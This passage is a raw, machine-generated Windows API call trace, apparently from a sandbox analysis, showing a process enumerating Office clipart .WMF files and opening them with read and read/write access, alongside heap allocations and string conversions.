dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.950] AreFileApisANSI () returned 1 [0102.950] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.950] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a9f0 [0102.951] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x8a9f0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00524_.WMF") returned 69 [0102.951] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00524_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00524_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd685b3d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd685b3d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6abd89, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1b54)) returned 1 [0102.951] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a9f0 | out: hHeap=0x20000) returned 1 [0102.951] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0102.951] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0102.951] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cea0 | out: hHeap=0x20000) returned 1 [0102.951] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.951] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.951] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd685b3d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd685b3d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6abd89, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2576, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BL00525_.WMF", cAlternateFileName="")) returned 1 [0102.952] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.952] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.952] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.952] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.952] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.952] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.952] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.952] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.952] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0102.952] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34eb0 [0102.952] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0102.952] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34eb0 | out: hHeap=0x20000) returned 1 [0102.952] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0102.952] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0102.952] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0102.952] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0102.952] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.952] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0102.952] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.952] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f798 [0102.952] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0102.952] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.952] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a2d0 [0102.952] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0102.952] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.952] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.952] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.952] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.953] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a2d0 | out: hHeap=0x20000) returned 1 [0102.953] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.953] AreFileApisANSI () returned 1 [0102.953] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00525_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00525_.WMF", lpUsedDefaultChar=0x0) returned 69 [0102.953] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d058 [0102.953] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.953] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.953] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0102.953] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0102.953] AreFileApisANSI () returned 1 [0102.953] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.953] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8b078 [0102.953] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x8b078, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00525_.WMF") returned 69 [0102.953] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00525_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00525_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0102.953] GetFileType (hFile=0x33c) returned 0x1 [0102.953] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b078 | out: hHeap=0x20000) returned 1 [0102.954] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0102.954] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0102.954] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0102.954] CloseHandle (hObject=0x33c) returned 1 [0102.954] AreFileApisANSI () returned 1 [0102.954] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a9f0 [0102.954] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x8a9f0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00525_.WMF") returned 69 [0102.954] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00525_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00525_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0102.954] GetFileType (hFile=0x33c) returned 0x1 [0102.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a9f0 | out: hHeap=0x20000) returned 1 [0102.955] CloseHandle (hObject=0x33c) returned 1 [0102.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.955] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00525_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00525_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd685b3d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd685b3d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6abd89, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2576)) returned 1 [0102.955] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a660 | out: hHeap=0x20000) returned 1 [0102.955] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0102.955] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.955] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.955] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd65f8ed, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd65f8ed, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd685b3d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6ba0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BL00526_.WMF", cAlternateFileName="")) returned 1 [0102.955] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.955] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.955] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.955] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.955] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00526_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00526_.WMF", lpUsedDefaultChar=0x0) returned 69 [0102.955] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.955] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.955] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00526_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00526_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0102.956] GetFileType (hFile=0x33c) returned 0x1 [0102.956] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0102.956] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0102.956] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0102.956] CloseHandle (hObject=0x33c) returned 1 [0102.957] AreFileApisANSI () returned 1 [0102.957] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.957] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a828 [0102.957] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x8a828, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00526_.WMF") returned 69 [0102.957] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00526_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00526_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0102.957] GetFileType (hFile=0x33c) returned 0x1 [0102.957] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a828 | out: hHeap=0x20000) returned 1 [0102.957] CloseHandle (hObject=0x33c) returned 1 [0102.957] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.957] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.957] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.957] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.957] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.957] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.957] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.957] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0102.957] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0102.957] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0102.957] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0102.957] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0102.957] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0102.957] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.958] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0102.958] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0102.958] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.958] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.958] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.958] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.958] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.958] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.958] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.958] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.958] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.958] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.958] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.958] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.958] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.958] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.958] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.958] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.958] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.958] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.958] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.958] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.958] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.958] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.958] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.958] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.958] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.958] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.958] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.958] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.958] AreFileApisANSI () returned 1 [0102.958] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.958] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8b078 [0102.958] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x8b078, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00526_.WMF") returned 69 [0102.958] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00526_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00526_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd65f8ed, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd65f8ed, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd685b3d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6ba0)) returned 1 [0102.959] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b078 | out: hHeap=0x20000) returned 1 [0102.959] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0102.959] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0102.959] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd98 | out: hHeap=0x20000) returned 1 [0102.959] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.959] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.959] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6396e0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6396e0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd65f8ed, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2cec, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BL00648_.WMF", cAlternateFileName="")) returned 1 [0102.959] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.959] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.959] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.959] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.959] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.959] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.959] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.959] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.959] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0102.959] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35050 [0102.959] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0102.959] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35050 | out: hHeap=0x20000) returned 1 [0102.959] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0102.959] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350b0 [0102.959] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0102.959] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350b0 | out: hHeap=0x20000) returned 1 [0102.959] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.959] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0102.959] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.959] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fbb8 [0102.959] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0102.959] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.959] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ae18 [0102.959] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fbb8 | out: hHeap=0x20000) returned 1 [0102.959] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.959] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.959] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.959] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.959] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ae18 | out: hHeap=0x20000) returned 1 [0102.959] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.959] AreFileApisANSI () returned 1 [0102.959] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft 